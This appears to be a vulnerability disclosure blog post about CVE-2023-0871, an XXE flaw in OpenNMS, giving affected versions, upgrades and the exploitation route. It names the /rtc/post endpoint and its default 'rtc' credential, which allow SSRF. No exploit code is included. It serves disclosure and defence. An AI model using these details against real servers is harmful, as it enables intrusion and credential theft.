During recent security research, disclosed in August, we discovered an XML external entity injection (XXE) vulnerability, using Synopsys Seeker, an interactive application security testing (IAST) tool.
XXE vulnerabilities can be exploited by a threat actor sending a malicious HTTP request to an HTTP endpoint exposed by OpenNMS. This blog post explores the root cause analysis of the XML XXE bug, how it could be exploited by attackers, and the patches applied by the maintainers.
OpenNMS is a Java language open source network monitoring platform. The OpenNMS platform monitors some of the largest networks in the Fortune 500, covering the healthcare, technology, energy, finance, government, education, retail, and industrial sectors, many with tens of thousands of networked devices.
OpenNMS comes in two open source distributions: Horizon (community release) and Meridian (enterprise release) with AGPLv3 license. Additional components enhance the platform with distributed network monitoring (Minion), scalability (Sentinel), and scalable data persistence (Newts). OpenNMS is a high-value target since it allows a system administrator to monitor server/services, which in some cases require service/server credentials. That is, if an attacker were to gain access to the credentials of a monitored service/server, they could perform a lateral network movement and spread across other networks or network hosts.
CVE-2023-0871 impacts OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2. The mitigation is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38; or Horizon 32.0.2 or newer; or to not expose OpenNMS to the internet.
The exploitation involves sending one HTTP POST request to a HTTP endpoint (/rtc/post), which requires basic HTTP authentication. However, the default username and password, “rtc”, could be used to perform a server-side request forgery (SSRF) attack.